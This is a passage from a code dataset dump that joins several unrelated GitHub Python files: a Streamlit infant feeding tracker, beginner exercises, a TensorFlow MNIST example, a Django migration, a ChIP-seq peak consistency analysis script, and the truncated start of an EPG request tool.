df1_3=df1[df1['Date']==days3[2]]\n df_list=[df1_1,df1_2,df1_3]\n\n\n# st.write(\"test\", df1_1[(df1_1['Pee']=='Pee')| (df1_1['Poop']=='Poop')].count()[0])\n\n# var=['Total Diapers', 'Number Pee', 'Number Poop']\n days_d=[]\n for day in range(3):\n df_day=df_list[day]\n day_d={}\n day_d['Date']=days3[day]\n day_d['Total Diapers']= df_day[(df_day['Pee']=='Pee')| (df_day['Poop']=='Poop')].count()[0]\n day_d['N.o Poop']= df_day[(df_day['Poop']=='Poop')].count()[0]\n day_d['N.o Pee']= df_day[(df_day['Pee']=='Pee')].count()[0]\n days_d.append(day_d)\n days_df=pd.DataFrame(days_d)\n st.write(days_df)\n st.write(\"Feeding on \", days3[0])\n st.write(df1_1[['Date','Food', 'Quantity (ml)' ]].groupby('Food').sum())\n st.write(\"Feeding on \", days3[1])\n st.write(df1_2[['Date','Food', 'Quantity (ml)' ]].groupby('Food').sum())\n st.write(\"Feeding on \", days3[2])\n st.write(df1_3[['Date','Food', 'Quantity (ml)' ]].groupby('Food').sum())\n\n #st.write(df_i[['Date','Food', 'Quantity (ml)' ]].groupby('Food').sum())\n\n \n select_date = st.selectbox('Date',(days3[0], days3[1], days3[2]))\n if select_date==days3[0]:\n st.write(df1_1)\n elif select_date==days3[1]:\n st.write(df1_2)\n elif select_date==days3[2]:\n st.write(df1_3)\n\n\n\n# df1_yfood=df1_y[df1_y['Food']!='']\n# df1_yfood['Quantity (ml)']=df1_yfood['Quantity (ml)'].astype(int)\n# st.write(df1_y)\n# st.write(\"Number of Times Pee:\",df1_y[df1_y['Pee']!='']['Pee'].count())\n# st.write(\"Number of Times Poop:\",df1_y[df1_y['Poop']!='']['Poop'].count())\n# st.write(\"Total Feeding (ml):\",df1_yfood['Quantity (ml)'].sum())\n# st.write(df1_yfood[['Food', 'Quantity (ml)' ]].groupby('Food').sum())\n# st.write(\"Full Data\")\n# st.write(df1r)\n\n return\n\ndef full_data():\n df1=get_fulldata()\n df1r=df1[::-1]\n st.header(\"Full Data\")\n st.write(df1r)\n return\n\ndef food_chart(df1, var):\n df1_food=df1[df1['Food']!='']\n if var == 'Time':\n df1_food['Time']=pd.to_datetime(df1_food['Time']).dt.hour\n df1_food['Quantity (ml)']=df1_food['Quantity (ml)'].astype(int)\n df1_foodg=df1_food[[var,'Food', 'Quantity (ml)']].groupby([var,'Food']).sum()\n df1_foodg2=df1_foodg.to_records()\n df1_foodg2=pd.DataFrame.from_records(df1_foodg2)\n df1_foodg2_total=df1_foodg2.groupby(var).sum().reset_index()\n df1_foodg2_total = df1_foodg2_total.rename(columns = {'index':var})\n df1_foodg2_total['Food']='Total'\n df1_foodg2=df1_foodg2.append(df1_foodg2_total,ignore_index=True)\n C1=alt.Chart(df1_foodg2).mark_line(point=True).encode(\n x=var,\n y=alt.Y('Quantity (ml)', impute=alt.ImputeParams(value=0), scale=alt.Scale(domain=[0,750])),\n color='Food',\n tooltip = ['Food', 'Quantity (ml)', var]\n).properties(width=800,height=400,title='Food Quantity').interactive()\n \n return C1\n\ndef diaper_chart(df1,var):\n df1_poo=df1[df1['Poop']=='Poop']\n df1_pee=df1[df1['Pee']=='Pee']\n df1_peepoo=df1[(df1['Pee']=='Pee')| (df1['Poop']=='Poop')]\n if var == 'Time':\n df1_poo['Time']=pd.to_datetime(df1_poo['Time']).dt.hour\n df1_pee['Time']=pd.to_datetime(df1_pee['Time']).dt.hour\n df1_peepoo['Time']=pd.to_datetime(df1_peepoo['Time']).dt.hour\n df1_peepoo=df1_peepoo.groupby(var).count().reset_index()\n df1_peepoo['Total']=df1_peepoo['Pee']\n df1_peepoo=df1_peepoo[[var,'Total']]\n df1_poog1=df1_poo[[var,'Poop']].groupby(var).count().reset_index()\n df1_peeg1=df1_pee[[var, 'Pee']].groupby(var).count().reset_index()\n df1_diaper=df1_poog1.merge(df1_peeg1)\n\n df1_diaper=df1_diaper.merge(df1_peepoo)\n df1_diaper=df1_diaper.melt(var, var_name='Diaper', value_name='count')\n C2=alt.Chart(df1_diaper).mark_line(point=True).encode(\n x=var,\n y=alt.Y('count', impute=alt.ImputeParams(value=0), scale=alt.Scale(domain=[0,12])) ,\n color='Diaper',\n tooltip = ['Diaper', 'count',var]\n).properties(width=800,height=400,title='Diaper Count').interactive()\n \n return C2\n\n\n\ndef charts():\n df1=get_fulldata()\n st.header(\"Charts By Day\")\n C1=food_chart(df1, 'Date')\n C2=diaper_chart(df1, 'Date')\n st.write(C1)\n st.write(C2)\n st.header(\"Charts By Time\")\n C3=food_chart(df1, 'Time')\n C4=diaper_chart(df1, 'Time')\n st.write(C3)\n st.write(C4)\n\npage='Home'\npage=st.sidebar.selectbox(\"Which Page Would you like to go to?\", ('Home','Input', 'Full Data', 'Charts'))\nif page=='Input':\n get_inputs()\nif page=='Home':\n main()\nif page=='Full Data':\n full_data() \nif page=='Charts':\n charts()\n \n","repo_name":"jkattirtzi/Mtracker","sub_path":"Mtracker1.py","file_name":"Mtracker1.py","file_ext":"py","file_size_in_byte":7790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20438000065","text":"numeros = list()\r\nwhile True:\r\n n = int(input('Digite um numero: '))\r\n if n not in numeros:\r\n numeros.append(n)\r\n print('Valor adicionado com sucesso...')\r\n else:\r\n print('O valor digitado ja existe na lista... Nao adicionado')\r\n usuario = str(input('Quer continuar [S/N]: ')).strip().upper()[0]\r\n while usuario not in 'SN':\r\n print('opcao Invalida. Tente Novamente.')\r\n usuario = str(input('Quer continuar [S/ N]: ')).strip().upper()[0]\r\n if usuario in 'N':\r\n break\r\nnumeros.sort()\r\nprint('-=-'*15)\r\nprint(f'Voce digitou os seguintes numeros: ', end='')\r\nfor nr in numeros:\r\n print(nr, end=' ')\r\nprint('-=-'*15)\r\nprint('Programa Terminado')\r\n","repo_name":"Carmona-Elias/Python_CEV","sub_path":"D_079.py","file_name":"D_079.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27555212832","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\nsess = tf.InteractiveSession()\n\nin_units = 784\nh1_units = 300\nW1 = tf.Variable(tf.truncated_normal([in_units, h1_units], stddev=0.1))\nb1 = tf.Variable(tf.zeros([h1_units]))\nW2 = tf.Variable(tf.zeros([h1_units, 10]))\nb2 = tf.Variable(tf.zeros([10]))\n\nx = tf.placeholder(tf.float32, [None, in_units])\nkeep_prob = tf.placeholder(tf.float32)\n\nhidden1 = tf.nn.relu(tf.matmul(x, W1) + b1)\nhidden1_drop = tf.nn.dropout(hidden1, keep_prob)\ny = tf.nn.softmax(tf.matmul(hidden1_drop, W2) + b2)\n\n# Define loss and optimizer\ny_ = tf.placeholder(tf.float32, [None, 10])\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\ntrain_step = tf.train.AdagradOptimizer(0.3).minimize(cross_entropy)\n\n# Train\ntf.global_variables_initializer().run()\nfor i in range(3000):\n batch_xs, batch_ys = mnist.train.next_batch(100)\n train_step.run({x: batch_xs, y_: batch_ys, keep_prob: 0.75})\n\n# Test trained model\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nprint(accuracy.eval({x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))","repo_name":"MachineLP/Tensorflow-","sub_path":"Tensorflow/4_4_MLP.py","file_name":"4_4_MLP.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":1135,"dataset":"github-code","pt":"54"} +{"seq_id":"25660968564","text":"galera = []\npessoa = {}\nsomador = contador = 0\nwhile True:\n pessoa.clear() #Limpando para não repetir\n pessoa['Nome'] = str(input('Nome: '))\n while True: \n pessoa['Sexo'] = str(input('Sexo: [M/F]')).upper()[0]\n if pessoa['Sexo'] in 'MF':\n break\n else:\n print('ERRO. POR FAVOR, DIGITE M OU F.') \n pessoa['idade'] = int(input('Idade: '))\n somador += pessoa['idade']\n galera.append(pessoa.copy()) #Recebendo uma cópia de pessoa.\n while True:\n resposta = str(input('Quer continuar? [S/N]')).upper()[0]\n if resposta in 'SN':\n break #Para dois while é necessário dois break's.\n else: \n print('ERRO. POR FAVOR, DIGITE S OU N.')\n if resposta == 'N':\n break\nmedia = somador / len(galera)\nprint('-='*30)\nprint(galera)\nprint(f'A) Ao todo, foram cadastradas {len(galera)} pessoas.')\nprint(f'B) A média das pessoas cadastradas foi de {media:.1f} anos')\nprint('C) As mulheres cadastradas foram: ', end='')\nfor p in galera:\n if p['Sexo'] in 'Ff':\n print(f' -{p[\"Nome\"]}', end='')\n print() #Quebrar de linha\nprint (' D) lista das pessoas que estão acima da média: ',end='')\nfor p in galera:\n if p['idade'] > media:\n print(f' -{p[\"Nome\"]}',end='')\n print() #Quebrar Linha\nprint('<< ENCERRADO >>')","repo_name":"RonalddMatias/Curso-Completo-Python","sub_path":"Curso de Python/Python-Exercícios/ex094.py","file_name":"ex094.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42159545629","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('machine', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='machine',\n name='machine_ip',\n field=models.GenericIPAddressField(null=True, verbose_name=b'Machine IP', blank=True),\n ),\n ]\n","repo_name":"TeraMatrix/nocout_gis_open","sub_path":"nocout/machine/migrations/0002_auto_20150720_1351.py","file_name":"0002_auto_20150720_1351.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6068011938","text":"###\n### this script explore the distribution of patterns between expresion and peak locations\n###\n\nimport os,sys,numpy,pickle,copy\nimport multiprocessing, multiprocessing.pool\n\nimport matplotlib\nmatplotlib.use('Agg') # necessary for saving figures at remove machine\nimport matplotlib.pyplot\n\ndef consistentGenePerSampleFinder(flag):\n\n '''\n this function searches and stores genes with consistent pattern of FSSs per biological replicate\n '''\n\n bioReplicates=[('0hA','0hB'),('24hA','24hB'),('48hA','48hB')]\n consistentGenes={}\n \n for bio in bioReplicates:\n \n if flag == 'all':\n pairsOfPeaks=consistentAllPeaks[bio]\n elif flag == 'filtered':\n pairsOfPeaks=consistentFilteredPeaks[bio]\n else:\n print('error interpreting flag. exiting...')\n sys.exit()\n\n g=[]\n for peakPair in pairsOfPeaks:\n\n currentSampleLabel=peakPair[0].split('.')[0]\n currentPeakName=peakPair[0].split(currentSampleLabel+'.')[1]\n peakA=rawPeaks[currentSampleLabel][currentPeakName]\n closerA=peakLocator(peakA)\n\n currentSampleLabel=peakPair[1].split('.')[0]\n currentPeakName=peakPair[1].split(currentSampleLabel+'.')[1]\n peakB=rawPeaks[currentSampleLabel][currentPeakName]\n closerB=peakLocator(peakB)\n\n if closerA != None:\n if closerA == closerB:\n if closerA not in g:\n g.append(closerA)\n\n consistentGenes[bio]=g\n \n # storing the info into pickles\n if flag == 'all':\n jarFile=jarDir+'consistentGenes.all.pickle'\n elif flag == 'filtered':\n jarFile=jarDir+'consistentGenes.filtered.pickle'\n else:\n print('error interpreting flag. exiting...')\n sys.exit()\n \n f=open(jarFile,'wb')\n pickle.dump(consistentGenes,f)\n f.close()\n \n return None\n\ndef consistentPeakFinder(task):\n\n '''\n this function iterates over the peaks of another sample to find consistency\n '''\n\n consistentPeaks=[]\n \n # recovering task arguments\n workingPeakName=task[0]\n labelA=task[1]\n labelB=task[2]\n\n # searching the other sample for consistency\n founds=[]\n peakA=rawPeaks[labelA][workingPeakName] \n for peakNameB in rawPeaks[labelB]: \n peakB=rawPeaks[labelB][peakNameB] \n\n # check if they are in the same contig\n if peakA[0] == peakB[0]:\n flag,overlap=isConsistent([peakA,peakB])\n if flag == True:\n pairA=labelA+'.'+workingPeakName\n pairB=labelB+'.'+peakNameB\n consistentPair=[pairA,pairB]\n founds.append([consistentPair,overlap])\n \n # dealing with multiple hits\n if founds != []:\n if len(founds) == 1:\n consistentPeaks=founds[0][0]\n else:\n overlaps=[element[1] for element in founds]\n sortedOverlaps=copy.deepcopy(overlaps)\n sortedOverlaps.sort(reverse=True)\n if sortedOverlaps[0] != sortedOverlaps[1]:\n theIndex=overlaps.index(sortedOverlaps[0])\n consistentPeaks=founds[theIndex][0]\n else:\n feRanks=[]\n putativePeaks=[element[0][1] for element in founds if element[1] == sortedOverlaps[0]]\n feRanks=[rawPeaks[labelB][element.split(labelB+'.')[1]][-1] for element in putativePeaks]\n sortedFEranks=copy.deepcopy(feRanks)\n sortedFEranks.sort(reverse=True)\n selected=putativePeaks[feRanks.index(sortedFEranks[0])]\n consistentPeaks=[founds[0][0][0],selected]\n \n return consistentPeaks\n\ndef generalConsistency():\n\n '''\n this function checks the consistency of peaks over replicates\n '''\n\n hydra=multiprocessing.pool.Pool(numberOfThreads)\n \n consistentAllPeaks={}\n consistentFilteredPeaks={}\n \n samples=list(rawPeaks.keys())\n samples.sort()\n\n for i in range(len(samples)):\n filteredPeakNamesA=list(selectedPeaks[samples[i]].keys())\n for j in range(len(samples)):\n if i < j:\n filteredPeakNamesB=list(selectedPeaks[samples[j]].keys())\n comparisonA=[]\n comparisonF=[]\n theKey=(samples[i],samples[j])\n\n workNames=list(rawPeaks[samples[i]].keys())\n tasks=[[peakName,samples[i],samples[j]] for peakName in workNames]\n print('\\t comparing %s peaks between samples %s and %s...'%(len(tasks),theKey[0],theKey[1]))\n\n output=hydra.map(consistentPeakFinder,tasks) \n for element in output:\n if element != []:\n comparisonA.append(element)\n\n peakNameA=element[0].split(theKey[0]+'.')[1]\n peakNameB=element[1].split(theKey[1]+'.')[1]\n if peakNameA in filteredPeakNamesA and peakNameB in filteredPeakNamesB:\n comparisonF.append(element)\n \n consistentAllPeaks[theKey]=comparisonA\n consistentFilteredPeaks[theKey]=comparisonF\n print('\\t found {} all and {} filtered consistent peaks.'.format(len(comparisonA),len(comparisonF)))\n print()\n \n # creating variable for graphical representation\n MA=[]; MF=[]\n for i in range(len(samples)):\n va=[]; vf=[]\n for j in range(len(samples)):\n if i == j:\n valueA=len(rawPeaks[samples[i]])\n valueF=len(selectedPeaks[samples[i]])\n else:\n localKey=(samples[i],samples[j])\n inverseKey=(samples[j],samples[i])\n if localKey in consistentAllPeaks.keys():\n workingKey=localKey\n else:\n workingKey=inverseKey\n valueA=len(consistentAllPeaks[workingKey])\n valueF=len(consistentFilteredPeaks[workingKey])\n va.append(valueA)\n vf.append(valueF)\n MA.append(va)\n MF.append(vf)\n\n return consistentAllPeaks,consistentFilteredPeaks,MA,MF\n\ndef genomeOccupancyCalculator(assessingPeaks,label):\n\n '''\n this function computes the size of the genome peaks occupy\n '''\n\n sumLength=0\n allLabels=[]\n for peakName in assessingPeaks.keys():\n currentLabel=assessingPeaks[peakName][0]+'.'+str(assessingPeaks[peakName][1])+'.'+str(assessingPeaks[peakName][2])\n if currentLabel not in allLabels:\n allLabels.append(currentLabel)\n peakSize=assessingPeaks[peakName][3]\n sumLength=sumLength+peakSize\n percentage=sumLength/genomeSize\n print('\\tsum of',label,'peak lengths is',sumLength,'relative size',percentage)\n\n return None\n\ndef genomeReader():\n\n '''\n this function returns the position of genes\n '''\n\n genePositions={} # genePositions[geneName]=[chr,start,stop]\n\n with open(gff3File,'r') as f:\n next(f)\n next(f)\n for line in f:\n vector=line.split('\\t')\n if vector[2] == 'gene':\n geneName=vector[8].split('.v5.5')[0].split('ID=')[1]\n chromosome=vector[0]\n start=int(vector[3])\n stop=int(vector[4])\n genePositions[geneName]=[chromosome,start,stop]\n\n return genePositions\n\ndef getSignature10(task):\n\n '''\n this function returns the gene name for a peak with signature 10\n '''\n \n peakPair=task[0]\n flatCondition=task[1]\n extension=task[2]\n\n if extension == 'all':\n workingPeaks=rawPeaks\n elif extension == 'filtered':\n workingPeaks=selectedPeaks\n else:\n print('error from getSignature10. exiting...')\n sys.exit()\n\n currentSampleLabel=peakPair[0].split('.')[0]\n currentPeakName=peakPair[0].split(currentSampleLabel+'.')[1]\n currentChromosome=rawPeaks[currentSampleLabel][currentPeakName][0]\n \n # check that none of the two peaks of the pair is at the flatten condition\n founds=[]\n flattenPeaksA=[workingPeaks[flatCondition[0]][peakName] for peakName in workingPeaks[flatCondition[0]] if workingPeaks[flatCondition[0]][peakName][0] == currentChromosome]\n flattenPeaksB=[workingPeaks[flatCondition[1]][peakName] for peakName in workingPeaks[flatCondition[1]] if workingPeaks[flatCondition[1]][peakName][0] == currentChromosome]\n flattenPeaks=flattenPeaksA+flattenPeaksB\n for single in peakPair:\n peakA=rawPeaks[currentSampleLabel][currentPeakName]\n for peakB in flattenPeaks:\n flag,overlap=isConsistent([peakA,peakB])\n founds.append(flag)\n \n if sum(founds) == 0:\n geneName=peakLocator(peakA)\n else:\n geneName=None \n\n return geneName\n \ndef isConsistent(pair):\n\n '''\n this function compares 2 peaks: they are considered consistent if they share 50% of their average length.\n '''\n\n flag=False\n\n peakA=pair[0]\n peakB=pair[1]\n # compute overlap\n min1=peakA[1]\n max1=peakA[2]\n min2=peakB[1]\n max2=peakB[2]\n overlap=max(0, min(max1, max2) - max(min1, min2))\n if overlap > 0:\n # compute that overlap is at least 50% of average length\n averageLength=numpy.mean([peakA[3],peakB[3]])\n threshold=averageLength*0.5\n if overlap >= threshold:\n flag=True \n \n return flag,overlap\n\ndef matrixGrapher(M,labels,figureTitle):\n\n '''\n this figure builds the correlation matrix\n '''\n\n figureName=figuresDir+'peakConsistency.{}.{}.png'.format(figureTitle.split(' ')[0],figureTitle.split(' ')[1])\n\n matplotlib.pyplot.imshow(M,interpolation='none',cmap='viridis')\n cb=matplotlib.pyplot.colorbar(orientation='vertical',fraction=0.05) \n cb.set_label(label='Consistent Peaks',size=20)\n cb.ax.tick_params(labelsize=16)\n matplotlib.pyplot.grid(False)\n\n # setting the numbers\n x=0.\n y=0.\n deltax=1.\n deltay=1.\n for i in range(len(M)):\n for j in range(len(M)):\n stringValue=str(M[i][j])\n matplotlib.pyplot.text(x+deltax*i,y+deltay*j,stringValue,fontsize=16,color='white',horizontalalignment='center',verticalalignment='center',fontweight='bold')\n\n matplotlib.pyplot.xticks(range(len(labels)),labels,size=20,rotation=90)\n matplotlib.pyplot.yticks(range(len(labels)),labels,size=20)\n \n matplotlib.pyplot.tick_params(axis='x',which='both',bottom='off',top='off')\n matplotlib.pyplot.tick_params(axis='y',which='both',right='off',left='off')\n matplotlib.pyplot.axes().set_aspect('equal')\n matplotlib.pyplot.title(figureTitle,fontsize=24)\n matplotlib.pyplot.tight_layout(0.5)\n matplotlib.pyplot.savefig(figureName)\n\n matplotlib.pyplot.clf()\n\n return None\n\ndef peakLocator(peak):\n\n '''\n this function returns the gene closer to a peak:\n 1) it searches what gene has closer midpoint to peak midpoint\n 2) it returns a valid gene if it is within 20% of the length of the gene\n '''\n \n gene4Peak=None\n\n # 1. computing the gene with shortest distance\n distance=float('Inf')\n peakChromosome=peak[0]\n peakCenter=peak[1]+(peak[2]-peak[1])/2\n \n for geneName in genePositions.keys():\n workingChromosome=genePositions[geneName][0]\n \n if workingChromosome == peakChromosome:\n start=genePositions[geneName][1]\n stop=genePositions[geneName][2]\n interval=stop-start\n geneCenter=start+interval/2\n workingDistance=abs(geneCenter-peakCenter)\n if workingDistance < distance:\n distance=workingDistance\n gene4Peak=geneName \n \n # 2. check that the peak is within 20% of the length of the gene #### this function needs to be improved to avoid overlaps and search for at least 0.5 kb if gene is very small\n #! consider doing 33%. \n if gene4Peak != None:\n start=genePositions[gene4Peak][1]\n stop=genePositions[gene4Peak][2]\n interval=stop-start\n bottom=start-int(0.2*interval)\n top=stop+int(0.2*interval)\n\n if peak[1] > bottom and peak[2] < top:\n pass\n else:\n gene4Peak=None\n \n return gene4Peak\n\ndef peakReader():\n\n '''\n this function reads specific information from the peaks file generated by MACS2.0\n '''\n\n peaks={} # a dictionary with the following structure: peaks[name]=[chro,start,end,length,fe]\n peaksFile=peaksDir+peaksFileName\n with open(peaksFile,'r') as f:\n for line in f:\n vector=line.split('\\t')\n if len(vector) == 10:\n if 'peak' in vector[9]:\n\n # name\n brokenName=vector[9].split('_')\n name=brokenName[1]+'.'+brokenName[2].replace('\\n','')\n # chr\n chro=vector[0]\n # start\n start=int(vector[1])\n # end\n end=int(vector[2])\n # length\n length=int(vector[3])\n # fold-enrichment\n fe=float(vector[7])\n\n peaks[name]=[chro,start,end,length,fe]\n\n lastLetter=name[-1]\n if lastLetter.isdigit():\n numberOfPeaks=int(name.split('.')[1])\n else:\n numberOfPeaks=int(name.split('.')[1][:-1])\n numberOfSummits=len(peaks.keys())\n\n print('\\t%s peaks found; %s summits found.'%(numberOfPeaks,numberOfSummits))\n\n return peaks\n\ndef peaksDistributionPlotter(peaks,flag):\n\n '''\n this function build 2D histograms of peaks fe and size\n '''\n\n x=[];y=[]\n for name in peaks.keys():\n fe=peaks[name][-1]\n size=peaks[name][-2]\n \n x.append(fe)\n y.append(numpy.log10(size))\n\n feRange=[1,5]\n sizeRange=[2,4.05]\n\n h,xedges,yedges,tempo=matplotlib.pyplot.hist2d(x,y,bins=100,range=[feRange,sizeRange])\n z=numpy.log10(h+1).T\n zm=numpy.ma.masked_where(z == 0,z)\n\n \n newViridis=matplotlib.cm.viridis\n newViridis.set_bad('white') \n matplotlib.pyplot.imshow(zm,extent=[xedges[0],xedges[-1],yedges[0],yedges[-1]],cmap=newViridis,interpolation='nearest',origin='lower',aspect='auto',vmin=0,vmax=2)\n cb=matplotlib.pyplot.colorbar(fraction=0.05)\n cb.set_label(label='log$_{10}$ Peak Count',size=20)\n cb.ax.tick_params(labelsize=18)\n\n # highlightling area of best peaks\n matplotlib.pyplot.plot([2,5],[3,3],'-k',color='red',lw=2)\n matplotlib.pyplot.plot([2,2],[2,3],'-k',color='red',lw=2)\n \n matplotlib.pyplot.xlabel('Fold Enrichment',fontsize=28)\n matplotlib.pyplot.ylabel('Site Length (bp)',fontsize=28)\n\n positions=numpy.log10(numpy.array([100,200,300,500,750,1000,2000,4000,8000]))\n names=['100','200','300','500','750','1,000','2,000','4,000','8,000']\n matplotlib.pyplot.yticks(positions,names,fontsize=20)\n matplotlib.pyplot.xticks(fontsize=20)\n\n theTitle='sample '+flag.split('.')[1]\n matplotlib.pyplot.title(theTitle,fontsize=36)\n \n matplotlib.pyplot.tight_layout()\n \n matplotlib.pyplot.savefig(figuresDir+'figure.%s.png'%flag)\n matplotlib.pyplot.clf()\n\n return None\n\ndef peaksFilter():\n\n '''\n this function removes any peak that is lower than 2-fold and extends for longer than 1 kb. \n '''\n\n filteredPeaks={}\n\n Dfe=[]\n Dsize=[]\n Efe=[]\n Esize=[]\n\n for name in peaks.keys():\n fe=peaks[name][-1]\n size=peaks[name][-2]\n\n Dfe.append(fe)\n Dsize.append(size)\n \n if fe >= peakFEThreshold and size <= peakLengthThreshold:\n filteredPeaks[name]=peaks[name]\n \n Efe.append(fe)\n Esize.append(size)\n\n # printing the number of filtered peaks and summits\n allKeys=filteredPeaks.keys()\n numberOfSummits=len(allKeys)\n uniquePeaks=[]\n for element in allKeys:\n lastLetter=element[-1]\n if lastLetter.isdigit():\n value=int(element.split('.')[1])\n else:\n value=int(element.split('.')[1][:-1])\n uniquePeaks.append(value)\n uniquePeaks=list(set(uniquePeaks))\n numberOfPeaks=len(uniquePeaks)\n\n print('\\t%s filtered peaks found; %s filtered summits found.'%(numberOfPeaks,numberOfSummits)) \n \n return filteredPeaks\n\n##\n## MAIN\n##\n\n# 0. user defined variables\npeaksDir='/proj/omics4tb/alomana/projects/csp.jgi/data/macs2.run3/'\njarDir='/proj/omics4tb/alomana/projects/csp.jgi/results/jars.wk/'\ngff3File='/proj/omics4tb/alomana/projects/csp.jgi/data/genome/Creinhardtii_281_v5.5.gene.gff3'\nfiguresDir='/proj/omics4tb/alomana/projects/csp.jgi/results/figures/'\n\nnumberOfThreads=64\n\n## testing\n## peaksDir='/proj/omics4tb/alomana/projects/csp.jgi/data/macs2.test/'\n## numberOfThreads=12\n##########\n\ncorrespondance={}\ncorrespondance['0hA']='ASCAO'\ncorrespondance['0hB']='ASCAP'\ncorrespondance['24hA']='ASCAS'\ncorrespondance['24hB']='ASCAT'\ncorrespondance['48hA']='ASCAU'\ncorrespondance['48hB']='ASCAW'\n\npeakFEThreshold=2\npeakLengthThreshold=1000\ngenomeSize=111098438\n\n# 0.1. reading gene locations\ngenePositions=genomeReader()\n\n# 1. selecting the samples\nprint('selecting samples...')\nallFiles=os.listdir(peaksDir)\npeaksFileNames=[element for element in allFiles if '_peaks.xls' in element if 'callerC' in element]\npeaksFileNames.sort()\n\n# 2. filter peaks: at least 2-fold and no longer than 1 kb\nprint('filtering samples...')\n\nrawPeaks={}\nselectedPeaks={}\nfor peaksFileName in peaksFileNames:\n\n label=peaksFileName.split('_')[0].split('.')[1]\n print('filtering sample %s...'%label)\n\n # 2.1. reading peaks\n peaks=peakReader()\n rawPeaks[label]=peaks\n filteredPeaks=peaksFilter()\n selectedPeaks[label]=filteredPeaks\n\n # 2.2. plot the distribution of peaks\n flag=peaksFileName.split('_peaks')[0]\n peaksDistributionPlotter(peaks,flag)\n\n # 2.3. computing the size of genome that peaks occupy\n genomeOccupancyCalculator(peaks,'all')\n genomeOccupancyCalculator(filteredPeaks,'filtered')\n\n# 3. define all genes that have matching patterns\nprint()\nprint('finding consistency among peaks...')\n\n# 3.1. finding consistent peaks among all peaks\nconsistentAllPeaks,consistentFilteredPeaks,MA,MF=generalConsistency()\n\n# 3.2. finding and storing genes with consistent peak presence\nprint('finding and storing genes with consistent peak presence...')\nconsistentGenePerSampleFinder('all')\nconsistentGenePerSampleFinder('filtered')\n\n# 3.3. plotting heat map of consistency counts for all and filtered peaks\nprint('analysis of consistent peaks...')\nsampleNames=list(rawPeaks.keys())\nsampleNames.sort()\nmatrixGrapher(MA,sampleNames,'full set')\nmatrixGrapher(MF,sampleNames,'filtered set')\n\n# 4. locating genes with variable signature\nprint()\nprint('defining genes with specific signatures...')\nhydra=multiprocessing.pool.Pool(numberOfThreads)\n\n# 4.1. 10 signature\nprint('\\t working with 10 signature...')\n\ngenesAllSignature10=[]\ngenesFilteredSignature10=[]\n\npositiveCondition=('0hA','0hB')\nflatCondition=('24hA','24hB')\n\ntasks=[[element,flatCondition,'all'] for element in consistentAllPeaks[positiveCondition]]\nprint('\\t interrogating',len(tasks),'consistent pairs of peaks...')\noutput=hydra.map(getSignature10,tasks)\ngenesAllSignature10=list(set(output))\ngenesAllSignature10.remove(None)\n\ntasks=[[element,flatCondition,'filtered'] for element in consistentFilteredPeaks[positiveCondition]]\nprint('\\t interrogating',len(tasks),'consistent and filtered pairs of peaks...')\noutput=hydra.map(getSignature10,tasks)\ngenesFilteredSignature10=list(set(output))\ngenesFilteredSignature10.remove(None)\n\nprint('%s genes found with broad 10 signature.'%len(genesAllSignature10))\nprint('%s genes found with filtered 10 signature.'%len(genesFilteredSignature10))\n\njarFile=jarDir+'signature10.pickle'\nf=open(jarFile,'wb')\npickle.dump([genesAllSignature10,genesFilteredSignature10],f)\nf.close()\n\n# 4.2. 01 signature\nprint('\\t working with 01 signature...')\n\ngenesAllSignature01=[]\ngenesFilteredSignature01=[]\n\nflatCondition=('0hA','0hB')\npositiveCondition=('24hA','24hB')\n\ntasks=[[element,flatCondition,'all'] for element in consistentAllPeaks[positiveCondition]]\nprint('\\t interrogating',len(tasks),'consistent pairs of peaks...')\noutput=hydra.map(getSignature10,tasks)\ngenesAllSignature01=list(set(output))\ngenesAllSignature01.remove(None)\n\ntasks=[[element,flatCondition,'filtered'] for element in consistentFilteredPeaks[positiveCondition]]\nprint('\\t interrogating',len(tasks),'consistent and filtered pairs of peaks...')\noutput=hydra.map(getSignature10,tasks)\ngenesFilteredSignature01=list(set(output))\ngenesFilteredSignature01.remove(None)\n\nprint('%s genes found with broad 01 signature.'%len(genesAllSignature01))\nprint('%s genes found with filtered 01 signature.'%len(genesFilteredSignature01))\n\njarFile=jarDir+'signature01.pickle'\nf=open(jarFile,'wb')\npickle.dump([genesAllSignature01,genesFilteredSignature01],f)\nf.close()\n\n# 5. final message\nprint()\nprint('... all done.')\n","repo_name":"adelomana/mendiak","sub_path":"patternFinder.py","file_name":"patternFinder.py","file_ext":"py","file_size_in_byte":21136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30537489272","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\ndesc: 请求epg服务器获取���资信息\ntime:2017-05-10\nauthor: achilles_xushy\n\"\"\"\nimport os\nimport time\nimport logging\nimport sys\nimport traceback\nimport requests\n\n\nfrom CDS_Auto_Import_tools import parameters_parse\nfrom CDS_Auto_Import_tools import xml_parser\n\nr_log = logging.getLogger(parameters_parse.MY_LOG_NAME)\n\nq_headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0',\n \"Content-Type\": \"text/xml\",\n \"Connection\": \"close\"\n}\n\npj_dict = parameters_parse.get_para_dict()\n\nif pj_dict is None:\n r_log.error('get parameters error, please check log file and parameters_parse.py')\n sys.exit()\n\nCDN_URL = 